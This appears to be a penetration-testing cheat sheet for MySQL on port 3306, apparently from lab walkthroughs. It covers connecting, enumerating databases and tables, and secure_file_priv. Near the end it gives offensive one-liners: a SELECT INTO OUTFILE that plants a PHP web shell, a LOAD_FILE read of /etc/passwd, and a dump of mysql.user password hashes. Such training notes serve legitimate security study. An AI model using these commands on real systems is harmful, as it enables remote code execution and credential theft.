MySQL - Walkthroughs

#sql #mysql #port `3306` ```shell mysql -u root -h *IP ADDRESS* ``` ```cmd mysql.exe -u username -pPassword123 -h 10.129.20.13 ``` ```mysql SHOW DATABASES; USE *DATABASE*; SHOW TABLES; SELECT * FROM *TABLE*; ``` Command | Description -|- mysql -u \<user\> -p\<password\> -h \<IP address\> |Connect to the MySQL server. There should not be a space between the '-p' flag, and the password. show databases; |Show all databases. use \<database\>; |Select one of the existing databases. show tables; |Show all available tables in the selected database. show columns from \<table\>; |Show all columns in the selected database. select * from \<table\>; |Show everything in the desired table. select * from \<table\> where \<column\> = "\<string\>"; |Search for needed string in the desired `MySQL` default system schemas/databases: - `mysql` - is the system database that contains tables that store information required by the MySQL server - `information_schema` - provides access to database metadata - `performance_schema` - is a feature for monitoring MySQL Server execution at a low level - `sys` - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema ```mysql SHOW DATABASES; ``` ```mysql SHOW TABLES; ``` ```mysql SELECT table_name FROM htbusers.INFORMATION_SCHEMA.TABLES; ``` ```mysql SELECT * FROM users; ``` *NOTE:* SQLcmd requires the use of GO after typing in the SQL command. ## Execute Commands `MySQL` does not have a stored procedure like `xp_cmdshell`, but we can achieve command execution if we write to a location in the file system that can execute our commands. ```mysql SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'; ``` These operations are permitted only to users who have the [FILE](https://dev.mysql.com/doc/refman/5.7/en/privileges-provided.html#priv_file) privilege. ```mysql show variables like "secure_file_priv"; ``` `secure_file_priv` may be set as follows: - If empty, the variable has no effect, which is not a secure setting. - If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it. - If set to NULL, the server disables import and export operations. ## MySQL - Read Local Files in MySQL ```mysql select LOAD_FILE("/etc/passwd"); ``` ```mysql SELECT User, Host, Password FROM mysql.user; ```